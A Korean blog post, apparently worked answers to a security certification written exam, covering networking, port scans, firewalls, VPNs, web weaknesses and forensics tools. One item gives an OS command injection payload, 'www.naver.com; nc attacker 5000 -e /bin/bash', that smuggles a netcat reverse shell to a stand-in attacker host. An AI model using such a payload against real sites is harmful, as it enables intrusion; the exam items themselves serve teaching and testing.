본문 바로가기
카테고리 없음

보안기술 필답평가 풀이

by ^..^v 2021. 3. 5.
728x90
반응형

인터넷 공간에서 각 호스트의 고유한 식별자를 의미하는 것으로 컴퓨터 네트워크에서 장치들이 서로를 인식하고 통신하기 위해서 사용하는 주소로 가장 적합한 것은?

1. Port

2. IP

3. Subnet mask

4. Gateway



정답: 2
Port : 소프트웨어에서는 네트워크 서비스나 특정 프로세스를 식별하는 논리 단위
IP : 인터넷 공간에서 각 호스트의 고유한 식별자로, 컴퓨터 네트워크에서 장치들이 서로를 인식하고 통신을 하기 위해서 사용하는 특수한 번호
Subnet mask : IP 주소를 네트워크 ID와 호스트 ID로 구분하는 방법
Gateway : 각기 다른 네트워크 ID를 사용하는 LAN 영역 사이를 연결해 주는 기능




다음과 같은 유형의 패킷이 발견되었을 때 예상할 수 있는 것으로 가장 올바른 것은?

1. 공격자가 80포트로 웹 서버의 임의 포트로 연결을 시도하고 있다.

2. Slowloris 공격이 진행되고 있다.

3. 웹 서버의 Backlog queue를 활성화하는 것으로 방어할 수 있다.

4. SYN 플로딩 공격이 진행되고 있다.



정답: 2
HTTP 요청 헤더의 끝을 나타내는 개행문자(0d0a)를 보내지 않고 지속적으로 의미 없는 변수를 추가하여 웹 서버의 연결을 유지하는 공격 기법




다음과 같은 결과로 예측할 수 있는 내용으로 가장 적합한 것은?

 

1. 해당 호스트의 DNS 캐시 테이블을 변조하고 있다.

2. 웹 서버의 정상적인 서비스를 방해하는 공격이 진행되고 있다.

3. 해당 호스트를 대상으로 ARP 스프핑 공격이 진행되고 있다.

4. 서로 다른 네트워크 공간에 위치한 호스트를 대상으로 수행하는 공격이다.



정답: 4
ARP 스프핑 공격은 동일 네트워크, 즉 LAN 영역에서 수행됨




IP 주소를 네트워크 ID와 호스트 ID로 구분하는데 사용하는 것으로 가장 적합한 것은?

1. Port

2. IP

3. Subnet mask

4. DNS



정답: 3




다음과 같은 패킷이 검출되었을 때 수행되고 있을 것으로 예상되는 스캐닝 방법은?

1. Half Open Scan

2. FIN Scan

3. NULL Scan

4. XMAS Scan



정답: 4
정상적인 상황에서는 함께 설정될 수 없는 플래그를 여러개 함께 설정해서 전달




다음 중 SQL Injection을 방어하기 위한 파이썬 코드로 가장 올바른 것은?

1. cursor.execute("SELECT admin FROM users WHERE username = '%s'" % username)

2. cursor.execute("SELECT admin FROM users WHERE username = %(uname)", {'uname': username})

3. cursor.execute("SELECT admin FROM users WHERE username = '{}'".format(username))

4. cursor.execute(f"SELECT admin FROM users WHERE username = '{username}'")



정답: 2
SQL Injection 공격을 방어하기 위해서는 쿼리문의 구조를 정의하고, 정의된 쿼리문 구조에 인자값을 전달하는 방식으로 구현해야 함




파일 업로드 기능이 존재하는 경우 확인해야 할 사항으로 가장 거리가 먼 것은?

1. 업로드 파일 선택창이 별도의 윈도우를 통해서 제공되는지 확인한다.

2. 업로드 파일의 크기와 개수를 제한하는지 확인한다.

3. 외부에서 접근할 수 없는 경로에 업로드 파일을 저장하는지 확인한다.

4. 업로드 파일의 종류를 제한하는지 확인한다.



정답: 1
파일 업로드 취약점을 방어하기 위해서는 
(1) 업로드 파일의 크기와 개수, 종류를 제한하고, 
(2) 외부에서 접근할 수 없는 경로에 업로드 파일을 저당해야 하며, 
(3) 저장 파일명과 저장 경로를 외부에서 알 수 없도록 해야 하며, 
(4) 업로드 파일의 실행 속성을 제거하고 저장해야 합니다. 




다음 중 크로스 사이트 스크립트 보안약점에 대한 설명으로 가장 거리가 먼 것은?

1. 요청 주체와 요청 절차를 확인하지 않고 요청을 처리하는 경우 발생할 수 있다.

2. 공격자가 전달한 스크립트 코드를 DB에 저장 후 희생자에게 지속적으로 제공하는 것을 저장 XSS라고 한다.

3. 사용자 화면 생성 시 실행 가능한 코드 또는 HTML 태그 요소가 실행되지 않도록 이스케이프 처리하는 것으로 방어할 수 있다.

4. 입력값에 실행 가능한 코드 포함 여부를 확인하지 않고 다음 화면 출력에 사용하는 경우 발생할 수 있다.



정답: 1
크로스 사이트 스크립트 보안약점은 공격자가 전달한 스크립트 코드가 사용자 브라우저를 통해 실행되는 경우 발생하는 것으로, 사용자 브라우저에서 계획되지 않은 스크립트 코드가 실행되지 않도록 하는 것이 중요합니다. 
보기 1번의 요청 주체와 요청 절차를 확인하지 않고 요청을 처리하는 경우 발생하는 취약점은 크로스 사이트 요청 위조가 되겠습니다. 




운영체제 명령어 삽입 취약점을 가진 웹 사이트에 리버스 쉘을 실행하는 명령어로 가장 올바른 것은?

1. www.naver.com; nc attacker 5000 -e /bin/bash

2. nc attacker 5000 -e /bin/bash

3. nc attacker 5000 -e /bin/bash ; www.naver.com

4. nc attacker 5000 -e /bin/bash & www.naver.com



정답: 1
서버 내부 로직이 exec("nslookup ___________") 형식으로, 외부 입력값은 nslookup이라는 운영체제 명령어의 파라미터로 사용되는 구성되어 있으므로, nslookup 명령어 실행에 필요한 www.naver.com과 함께 추가 명령어 실행을 의미하는 세미콜론(;), 그리고, 웹 서버 내부에서 외부 공격자 서버로 접속 후 쉘 실행을 의미하는 nc attacker 5000 -e /bin/bash 명령어를 입력하여 리버스 쉘을 실행합니다. 




게시판 상세 페이지 파라미터에 1896을 입력했을 때 게시판 목록에 없는 페이지가 출력되는 현상에 대한 설명으로 가장 올바르지 않은 것은?

 

1. 데이터 레이어에서의 접근통제가 되고 있지 않다.

2. 유일키만으로 상세 페이지에 출력할 데이터를 조회하고 있는 경우 발생할 수 있다.

3. 사용자가 로그인 여부를 확인하지 않고 기능을 제공했을 때 발생할 수 있다.

4. 데이터에 대한 사용자 접근 권한을 확인하지 않을 때 발생한다.



정답: 3
3번은 "적절한 인증 없는 중요기능 허용" 보안약점에 대한 설명입니다. 




Standard ACL에서는 어떤 조건으로 패킷을 분류하여 정책을 적용하는가?

1. Dest IP Address (목적지 IP)

2. Dest IP 또는 Dest Port (목적지 IP 및 Port)

3. Source IP 및 Dest IP (소스 IP 및 목적지 IP)

4. Source IP (소스 IP)



정답: 4
시스코 라우터가 제공하는 기본 IP ACL (P876)

  • Standard IP ACL : IP 소스 주소를 기반으로 패킷을 필터링

  • Extended IP ACL : 프로토콜 종류, 소스 및 대상 IP 주소, 소스 및 대상 TCP/UDP 포트에 따라 IP 패킷을 필터링

 

 

 

방화벽 동작 방식 중 하나로 해당 서비스 마다 프록시 데몬이 구동 되어야 하며 해당 서비스 별로 별도의 Proxy 데몬이 구동되는 방식은?

1. 침입 탐지 시스템

2. 상태 기반 감시

3. 어플리케이션 게이트웨이

4. 패킷 필터링



정답: 3
방화벽 동작 방식 (61P)
방화벽은 동작 방식에 따라 패킷 필터링 방식, 어플리케이션 게이트웨이 방식, 상태 기반 감시(Stateful Inspection) 방식, 다이나믹 패킷 필터링 방식, 하이브리드 방식으로 구분할 수 있으며, 문제에서 설명하고 있는 방식은 어플리케이션 게이트웨이 방식입니다.

 

 

 

IPS 설치 구성 중 아래와 같은 구성을 무엇이라 하는가?(여기서 WAPPLES을 IPS라 가정함)

1. In-Line 모드

2. SPAN 모드

3. Reverse Proxy 모드

4. HA 구성 모드



정답: 1
네트워크 방화벽 구성과 동일하게 모든 트래픽이 해당 보안장비를 거쳐야만 목적지로 전송될 수 있도록 네트워크를 구성하는 방식




보안 제품 중 여러 보안 장비의 기능을 하나의 장비에서 수행할 수 있으며 광범위한 보안 기술을 제공하며 배포 및 관리가 간단한 제품은?

1. VPN

2. WAF

3. DLP

4. UTM 



정답: 4
통합위협관리솔루션(UTM: Unified Threat Management) - 여러 보안 장비의 기능을 하나의 장비에서 수행할 수 있으며 안전하고 통합된 기술을 제공
데이터유출방지솔루션(DLP: Data Loss Prevention) - 기업 내의 다양한 주요 정보를 보호하며 외부 유출을 차단 또는 방지하기 위한 장비
웹방화벽(WAF: Web Application Firewall) 
가상사설망(VPN)

 

 

 

VPN 방식 중 인증헤더 (AH)와 데이터 암호화(ESP)를 함께 지원하는 방식은?

1. L2TP

2. PPTP

3. SSL VPN

4. IPSEC VPN



정답: 4
VPN 프로토콜 방식 (100P)

  • IPSEC VPN (500/UDP)

    • IPSEC - 데이터 전송을 하는데 각 IP 패킷을 암호화하거나 부호화하여 IP를 보호하기 위한 프로토콜

    • 데이터 송신자의 인증을 허용하는 인증 헤더(AH)와 송신자의 인증 및 데이터 암호화를 함께 지원하는 ESP(Encapsulating Security Payload) 등 두 종류의 보안 서비스를 제공

    • 전용 SW로 설치해야 되는 단점이 있음

  • SSL VPN (443/TCP)

    • SSL(Secure Socket Layer)은 웹 서버와 브라우저 사이에서 안전한 통신을 위해 넷스케이프에서 제창한 프로토콜

    • 세션 레벨에서 암호화에 의한 기밀성, 인증에 의한 정당성 및 안전성을 제공

    • MS IE, 넷스케이프 네비게이트 등의 웹 브라우저에서 표준으로 탑재

    • HTTP 프로토콜만을 대상으로 하고 있는 것은 아니고, Telnet, NNTP, LDAP 등 프로토콜 사용도 가능




와이어샤크 필터링 중 TCP와 UDP만 필터링 하기 위한 맞는 필터링 기법은?

1. TCP || UDP

2. TCP && UDP

3. TCP ^^ UDP

4. TCP UDP



정답: 1




DirBuster와 같은 웹 디렉터리 / 파일 스캔을 하는 경우 웹 상태 코드 중 어떠한 값이 많이 남게 되는가?

1. 304

2. 404

3. 500

4. 400



정답: 2
304(수정되지 않음): 마지막 요청 이후 요청한 페이지는 수정되지 않았다.
400(잘못된 요청): 서버가 요청의 구문을 인식하지 못했다.
404(Not Found, 찾을 수 없음): 서버가 요청한 페이지(Resource)를 찾을 수 없다.
500(내부 서버 오류): 서버에 오류가 발생하여 요청을 수행할 수 없다.
스캐닝의 특성 상 서버에 존재하지 않은 파일에 대한 요청이 빈번하게 발생할 수 있으며, 이때 서버는 404 오류를 반환합니다.

 

 

Sysinternals Suite 도구 중 시스템 시작시 자동으로 로드 되는 프로그램을 각 분류 별로 확인할 수 있는 도구는 무엇인가?

1. Sysmon

2. Process Explorer

3. Process Monitor

4. Autoruns



정답: 4
윈도우 시스템 및 네트워크 증거 수집 도구 (125P)

  • Filemon : 실시간으로 파일이 실행되는 내용을 모니터링

  • Regmon : 실시간으로 레지스트리가 실행되는 내용을 모니터링

  • Process Explorer : 프로세스를 감시하거나 제거할 때 사용

  • Process Monitor  : Filemon과 Regmon을 결합한 실시간 모니터링 툴

  • Autoruns : 현재 구동 중인 서비스와 실행된 프로그램 모니터링 (Scheduled Tasks 기능)




아래 그림을 보고 정상적인 포트가 열려 있는 경우 어떠한 응답으로 서버에서 반응하는가?

1. tcp.flags == 0x010

2. tcp.flags == 0x018 

3. tcp.flags == 0x012

4. tcp.flags == ack && syn



정답: 3
Wireshark TCP Flag Filtering
0x010 = 0000 0001 0000 → ACK
0x018 = 0000 0001 1000 → ACK + PSH
0x012 = 0000 0001 0010 → ACK + SYN ⇒ tcp.flags.syn==1 && tcp.flags.ack==1
포트가 정상적으로 열려 있다면 3 way handshaking 절차를 수행하므로, ACK + SYN 패킷을 반환합니다.

 

 

 

파일 시스템에서 FAT32의 VBS(부트 섹터)의 백업 본은 몇 번 섹터에 존제하는가?

1. 0

2. 6

3. 8

4. 가장 마지막 섹터



정답: 2
FAT32(File Allocation Table) 구조 (49P)




 

다음 중 용어에 대한 설명으로 가장 거리가 먼 것은?

1. IP - 인터넷 공간에서 각 호스트의 고유한 식별자를 의미한다.

2. Subnet mask - IP 주소를 네트워크 ID와 호스트 ID로 구분하는 방법이다.

3. Gateway - 각기 다른 네트워크 ID를 사용하는 LAN 영역 사이를 연결해 주는 기능을 수행한다.

4. Port - 네트워크 세그먼트의 데이터 링크 계층에서 통신을 위한 네트워크 인터페이스에 할당된 고유 식별자를 의미한다.

 

 

정답: 4

 

 

 

HTTP 요청 헤더의 끝을 나타내는 개행문자를 보내지 않고 지속적으로 의미 없는 변수를 추가하여 웹 서버의 연결을 유지하는 공격 기법으로 가장 적합한 것은?

1. SYN 플로딩

2. Slowloris 공격

3. HTTP 응답 분할

4. HTTP 요청 분할



정답: 2



 

TCP/IP 계층 중 데이터그램 또는 세그먼트를 데이터 전송 단위로 가지는 계층은?

1. 응용 계층

2. 전송 계층

3. 네트워크 계층

4. 데이터링크 계층



정답: 2



 

다음과 같은 패킷이 검출되었을 때 수행되고 있을 것으로 예상되는 포트 스캐닝 방법은?

1. Half Open Scan

2. FIN Scan

3. XMAS Scan

4. NULL Scan

 

 

정답: 4



 

다음 중 보안약점과 그에 대한 설명으로 가장 거리가 먼 것은?

 

1. 크로스사이트 스크립트 - 공격자가 전달한 스크립트 코드가 사용자 브라우저를 통해 실행되는 경우에 발생한다.

2. 파일 업로드 취약점 - 업로드 파일의 크기, 개수, 종류를 제한하지 않고 외부에서 접근 가능한 경로에 저장하는 경우에 발생한다.

3. SQL 인젝션 - 쿼리문의 구조를 미리 정의하고 정의된 쿼리 구조에 외부 입력값을 파라미터로 전달하는 방식으로 쿼리를 실행하는 경우에 발생한다.

4. 운영체제 명령어 삽입 - 외부 입력값을 제한하지 않고 운영체제 명령어 또는 명령어의 일부로 사용하는 경우에 발생한다.



정답: 3
3번의 설명은 SQL 인젝션 방어 기법에 대한 설명입니다.
728x90
반응형
저작자표시 비영리 변경금지

댓글

티스토리툴바